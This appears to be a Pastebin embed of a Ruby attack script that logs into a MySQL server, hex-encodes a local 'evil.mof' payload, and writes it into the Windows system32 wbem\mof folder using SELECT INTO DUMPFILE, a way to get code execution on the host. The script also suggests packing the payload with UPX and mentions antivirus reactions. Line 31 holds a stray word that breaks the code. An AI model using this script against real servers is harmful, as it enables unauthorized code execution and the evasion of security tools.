document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. #!/usr/bin/env ruby
  2. # Code Snippet by HR
  3.  
  4. # We need mysql gem for connection handling
  5. require \'rubygems\'
  6. require \'mysql\'
  7.  
  8. target=\'127.0.0.1\' # Your Target IP running MySQL
  9. user=\'username\'    # MySQL User
  10. pass=\'password\'    # MySQL Password
  11. file=\'/local/path/to/evil.mof\' # Local Evil .MOF File to upload
  12. target_path="c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\wbem\\\\\\\\mof\\\\\\\\evil.mof" # Path on Target to MOF compiler
  13.  
  14. # Establish connection or fail
  15. begin
  16.   dbc = Mysql.connect(target, user, pass)
  17. rescue Mysql::Error => e
  18.   puts "Connection Problem!"
  19.   puts "\\t=> #{e}"
  20.   exit 666;
  21. end
  22.  
  23. # Take our local file, convert to hex and write to target filesystem
  24. # This will work for any binary file, not just .MOF files....
  25. # Try to keep your upload file size small or you will have to use more SQL magic to upload it in chunks to a temp db and table, then dump the table content to file but lets keep it simple....
  26. data = "0x" + File.open(file, \'rb\').read.unpack(\'H*\').first
  27. begin
  28.   dbc.query("SELECT #{data} INTO DUMPFILE \'#{target_path}\'")
  29.   puts "File uploaded successfully!"
  30. rescue Mysql::Error => e
  31.   puts "Problem writing payload to file!"white
  32.   puts "\\t=> #{e}"
  33.   if e =~ /MySQL server has gone away/
  34.     puts "This is likely due to payload which is too large in size....."
  35.     puts "Try compressing with UPX to shrink size down: upx 9 -qq #{file}" # UPX can shrink your payload big time, but can cause some AV to freak out so be smart and use what works for you....
  36.     puts "\\t=> Then try again....."
  37.   end
  38. end
  39. #EOF
');